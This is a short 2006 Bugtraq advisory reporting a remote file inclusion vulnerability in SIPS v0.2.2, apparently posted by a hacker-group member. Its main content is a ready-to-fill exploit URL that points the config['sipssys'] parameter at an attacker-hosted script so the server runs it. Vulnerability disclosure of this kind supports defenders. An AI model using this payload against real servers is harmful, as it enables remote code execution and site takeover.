
Date: 10 Sep 2006 03:02:39 -0000
From: the.leo.008@...il.com
To: bugtraq@...urityfocus.com
Subject: SIPS v 0.2.2 < = Remote File Include Vulnerability

# SIPS v 0.2.2 < = = = = = = = = = = = = = > Remote File Include Vulnerability ;

# Discovred By     : ThE__LeO ;

# Software         : SIPS v 0.2.2 ;

# Exploit          : http://Www.Example.Com/[Script]/sipssys/code/box.inc.php?config["sipssys"]=[U r Evil Script] ;

# Greetz           : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47], Death & All Moroccan & Arab Hackers ;     
